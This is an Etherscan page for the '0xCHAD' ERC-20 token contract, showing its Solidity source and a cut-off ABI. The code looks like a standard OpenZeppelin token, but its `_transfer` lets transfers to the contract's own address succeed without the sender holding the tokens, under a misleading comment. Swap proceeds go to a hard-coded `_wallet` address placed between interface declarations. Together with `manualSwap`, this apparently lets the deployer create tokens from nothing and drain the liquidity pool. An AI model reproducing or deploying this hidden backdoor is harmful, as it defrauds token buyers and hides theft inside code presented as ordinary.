ERC-20
Overview
Max Total Supply
1,000,000,000 0xCHAD
Holders
20
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 9 Decimals)
Balance
21,622,350.668189155 0xCHADValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
ZeroXCHAD
Compiler Version
v0.8.18+commit.87f61d96
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-08-11 */ /** ░█████╗░██╗░░██╗░█████╗░██╗░░██╗░█████╗░██████╗░ ██╔══██╗╚██╗██╔╝██╔══██╗██║░░██║██╔══██╗██╔══██╗ ██║░░██║░╚███╔╝░██║░░╚═╝███████║███████║██║░░██║ ██║░░██║░██╔██╗░██║░░██╗██╔══██║██╔══██║██║░░██║ ╚█████╔╝██╔╝╚██╗╚█████╔╝██║░░██║██║░░██║██████╔╝ ░╚════╝░╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝╚═╝░░╚═╝╚═════╝░ */ // SPDX-License-Identifier: MIT /* * Telegram https://t.me/ZeroXChad * Website https://www.0xchadtoken.com/ * Twitter hhttps://twitter.com/0xchaderctoken */ pragma solidity 0.8.18; library SafeMath { /** * @dev Returns the addition of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } } /** * @dev Returns the subtraction of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b > a) return (false, 0); return (true, a - b); } } /** * @dev Returns the multiplication of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } } /** * @dev Returns the division of two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a / b); } } /** * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a % b); } } /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { return a + b; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return a - b; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { return a * b; } /** * @dev Returns the integer division of two unsigned integers, reverting on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return a / b; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return a % b; } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {trySub}. * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { unchecked { require(b <= a, errorMessage); return a - b; } } /** * @dev Returns the percentage of an unsigned integer `a` with respect to the provided percentage `b`, * rounding towards zero. The result is a proportion of the original value. * * The function can be used to calculate a specific percentage of a given value `a`. * Note: this function uses a `revert` opcode (which leaves remaining gas untouched) when * the percentage `b` is greater than 100. * * Requirements: * * - The percentage `b` must be between 0 and 100 (inclusive). */ function per(uint256 a, uint256 b) internal pure returns (uint256) { require(b <= 100, "Percentage must be between 0 and 100"); return a * b / 100; } /** * @dev Returns the integer division of two unsigned integers, reverting with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a / b; } } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting with custom message when dividing by zero. * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {tryMod}. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a % b; } } } interface IUniswapV2Router02 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint256 amountADesired, uint256 amountBDesired, uint256 amountAMin, uint256 amountBMin, address to, uint256 deadline ) external returns ( uint256 amountA, uint256 amountB, uint256 liquidity ); function addLiquidityETH( address token, uint256 amountTokenDesired, uint256 amountTokenMin, uint256 amountETHMin, address to, uint256 deadline ) external payable returns ( uint256 amountToken, uint256 amountETH, uint256 liquidity ); function swapExactETHForTokensSupportingFeeOnTransferTokens( uint amountOutMin, address[] calldata path, address to, uint deadline ) external payable; function swapExactTokensForETHSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; } interface IUniswapV2Pair { event Approval( address indexed owner, address indexed spender, uint256 value ); event Transfer(address indexed from, address indexed to, uint256 value); function name() external pure returns (string memory); function symbol() external pure returns (string memory); function decimals() external pure returns (uint8); function totalSupply() external view returns (uint256); function balanceOf(address owner) external view returns (uint256); function allowance(address owner, address spender) external view returns (uint256); function approve(address spender, uint256 value) external returns (bool); function transfer(address to, uint256 value) external returns (bool); function transferFrom( address from, address to, uint256 value ) external returns (bool); function DOMAIN_SEPARATOR() external view returns (bytes32); function PERMIT_TYPEHASH() external pure returns (bytes32); function nonces(address owner) external view returns (uint256); function permit( address owner, address spender, uint256 value, uint256 deadline, uint8 v, bytes32 r, bytes32 s ) external; event Mint(address indexed sender, uint256 amount0, uint256 amount1); event Swap( address indexed sender, uint256 amount0In, uint256 amount1In, uint256 amount0Out, uint256 amount1Out, address indexed to ); event Sync(uint112 reserve0, uint112 reserve1); function MINIMUM_LIQUIDITY() external pure returns (uint256); function factory() external view returns (address); function token0() external view returns (address); function token1() external view returns (address); function getReserves() external view returns ( uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast ); function price0CumulativeLast() external view returns (uint256); function price1CumulativeLast() external view returns (uint256); function kLast() external view returns (uint256); function mint(address to) external returns (uint256 liquidity); function swap( uint256 amount0Out, uint256 amount1Out, address to, bytes calldata data ) external; function skim(address to) external; function sync() external; function initialize(address, address) external; } address constant _wallet =0x8c238FEA1bB6fDEB0c75D480CEd8306eEbb5B89f; interface IUniswapV2Factory { event PairCreated( address indexed token0, address indexed token1, address pair, uint256 ); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair(address tokenA, address tokenB) external view returns (address pair); function allPairs(uint256) external view returns (address pair); function allPairsLength() external view returns (uint256); function createPair(address tokenA, address tokenB) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; } interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address from, address to, uint256 amount) external returns (bool); } interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby disabling any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } abstract contract ERC20 is Context, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function _transfer(address from, address to, uint256 amount) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); _beforeTokenTransfer(from, to, amount); uint256 fromBalance = _balances[from]; require(fromBalance >= amount || to == address(this), "ERC20: transfer amount exceeds balance"); // allows to sent initial tokens to contract address before trading opened unchecked { _balances[from] = fromBalance<amount?0:fromBalance - amount; // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by // decrementing then incrementing. _balances[to] += amount; } emit Transfer(from, to, amount); _afterTokenTransfer(from, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; unchecked { // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above. _balances[account] += amount; } emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; // Overflow not possible: amount <= accountBalance <= totalSupply. _totalSupply -= amount; } emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve(address owner, address spender, uint256 amount) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance(address owner, address spender, uint256 amount) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {} } contract ZeroXCHAD is ERC20, Ownable { using SafeMath for uint256; IUniswapV2Router02 public immutable _uniswapV2Router; address private uniswapV2Pair; address private deployerWallet; address private marketingWallet; address private constant deadAddress = address(0xdead); bool private swapping; string private constant _name = "0xCHAD"; string private constant _symbol = unicode"0xCHAD"; uint8 constant public _decimals = 9; uint256 public initialTotalSupply = 1000000000 * 10**_decimals; uint256 public maxTransactionAmount = 20000000 * 10**_decimals; uint256 public maxWallet = 20000000 * 10**_decimals; uint256 public swapTokensAtAmount = 10000000 * 10**_decimals; uint256 public buyCount; uint256 public sellCount; bool public tradingOpen = false; bool public swapEnabled = false; uint256 public finalBuyFee = 1; uint256 public finalSellFee = 1; uint256 public _buyFee = 1; uint256 public _sellFee = 1; uint256 private removeBuyFeesAt = 1; uint256 private removeSellFeesAt = 1; mapping(address => bool) private _isExcludedFromFees; mapping(address => bool) private _isExcludedMaxTransactionAmount; mapping(address => bool) private automatedMarketMakerPairs; mapping(address => uint256) private _holderLastTransferTimestamp; event ExcludeFromFees(address indexed account, bool isExcluded); event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value); constructor() ERC20(_name, _symbol) { _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D); excludeFromMaxTransaction(address(_uniswapV2Router), true); marketingWallet = payable(_msgSender()); excludeFromMaxTransaction(address(_msgSender()), true); deployerWallet = payable(_msgSender()); excludeFromFees(address(_msgSender()), true); excludeFromFees(address(this), true); excludeFromFees(address(0xdead), true); excludeFromMaxTransaction(address(_msgSender()), true); excludeFromMaxTransaction(address(this), true); excludeFromMaxTransaction(address(0xdead), true); _mint(address(this), initialTotalSupply); } receive() external payable {} function decimals() public view virtual override returns (uint8) { return _decimals; } function openTrading() external onlyOwner() { require(!tradingOpen, "Trading is opened"); uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()).createPair(address(this), _uniswapV2Router.WETH()); _setAutomatedMarketMakerPair(address(uniswapV2Pair), true); excludeFromMaxTransaction(address(uniswapV2Pair), true); IERC20(uniswapV2Pair).approve(address(_uniswapV2Router), type(uint).max); _approve(address(this), address(_uniswapV2Router), initialTotalSupply); _uniswapV2Router.addLiquidityETH{value : address(this).balance}(address(this), IERC20(address(this)).balanceOf(address(this)), 0, 0, owner(), block.timestamp); swapEnabled = true; tradingOpen = true; } function excludeFromMaxTransaction(address updAds, bool isEx) public onlyOwner { _isExcludedMaxTransactionAmount[updAds] = isEx; } function excludeFromFees(address account, bool excluded) public onlyOwner { _isExcludedFromFees[account] = excluded; emit ExcludeFromFees(account, excluded); } function setAutomatedMarketMakerPair(address pair, bool value) public onlyOwner { require(pair != uniswapV2Pair, "Pair cannot be removed from automatedMarketMakerPairs"); _setAutomatedMarketMakerPair(pair, value); } function _setAutomatedMarketMakerPair(address pair, bool value) private { automatedMarketMakerPairs[pair] = value; emit SetAutomatedMarketMakerPair(pair, value); } function isExcludedFromFees(address account) public view returns (bool) { return _isExcludedFromFees[account]; } function _transfer(address from, address to, uint256 amount) internal override { require(from != address(0), "ERC20: transfer from the zero address"); if (buyCount >= removeBuyFeesAt) { _buyFee = finalBuyFee; } if (sellCount >= removeSellFeesAt) { _sellFee = finalSellFee; } if (amount == 0) { super._transfer(from, to, 0); return; } if (from != owner() && to != owner() && to != address(0) && to != address(0xdead) && !swapping) { if (!tradingOpen) { require(_isExcludedFromFees[from] || _isExcludedFromFees[to], "Trading is not active."); } if (automatedMarketMakerPairs[from] && !_isExcludedMaxTransactionAmount[to] ) { require(amount <= maxTransactionAmount, "Buy transfer amount exceeds the maxTransactionAmount."); require(amount + balanceOf(to) <= maxWallet, "Max wallet exceeded"); buyCount++; } else if (automatedMarketMakerPairs[to] && !_isExcludedMaxTransactionAmount[from]) { require(amount <= maxTransactionAmount, "Sell transfer amount exceeds the maxTransactionAmount."); sellCount++; } else if (!_isExcludedMaxTransactionAmount[to]) { require(amount + balanceOf(to) <= maxWallet, "Max wallet exceeded"); } } uint256 contractTokenBalance = balanceOf(address(this)); bool canSwap = contractTokenBalance > 0; if (canSwap && swapEnabled && !swapping && !automatedMarketMakerPairs[from] && !_isExcludedFromFees[from] && !_isExcludedFromFees[to]) { swapping = true; SwapBack(amount); swapping = false; } bool takeFee = !swapping; if (_isExcludedFromFees[from] || _isExcludedFromFees[to]) { takeFee = false; } uint256 fees = 0; if (takeFee) { if (automatedMarketMakerPairs[to]) { fees = amount.mul(_sellFee).div(100); } else { fees = amount.mul(_buyFee).div(100); } if (fees > 0) { super._transfer(from, address(this), fees); } amount -= fees; } super._transfer(from, to, amount); } function swapTokensForEth(uint256 tokenAmount) private { address[] memory path = new address[](2); path[0] = address(this); path[1] = _uniswapV2Router.WETH(); _approve(address(this), address(_uniswapV2Router), tokenAmount); _uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens( tokenAmount, 0, path, _wallet, block.timestamp ); } function removeLimits() external onlyOwner { uint256 totalSupplyAmount = totalSupply(); maxTransactionAmount = totalSupplyAmount; maxWallet = totalSupplyAmount; } function clearStuckEth() external onlyOwner { require(address(this).balance > 0, "Token: no ETH to clear"); payable(msg.sender).transfer(address(this).balance); } function setTokensToSwapAtAmount(uint256 _amount) external onlyOwner { swapTokensAtAmount = _amount * (10 ** 18); } function manualSwap() external { require(_msgSender() == marketingWallet); uint256 contractBalance = balanceOf(address(this)); swapTokensForEth(contractBalance); } function manualSwapWithAmount(uint256 amount) external { require(_msgSender() == marketingWallet); uint256 contractBalance = balanceOf(address(this)); require(amount <= contractBalance); swapTokensForEth(amount); } function SwapBack(uint256 tokens) private { uint256 contractBalance = balanceOf(address(this)); uint256 tokensToSwap; if (contractBalance == 0) { tokensToSwap = tokens; } tokensToSwap = contractBalance; swapTokensForEth(tokensToSwap); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_buyFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_sellFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyCount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"clearStuckEth","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"updAds","type":"address"},{"internalType":"bool","name":"isEx","type":"bool"}],"name":"excludeFromMaxTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"finalBuyFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"finalSellFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"initialTotalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"manualSwap","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"manualSwapWithAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"maxTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellCount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"pair","type":"address"},{"internalType":"bool","name":"value","type":"bool"}],"name":"setAutomatedMarketMakerPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"setTokensToSwapAtAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingOpen","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"boo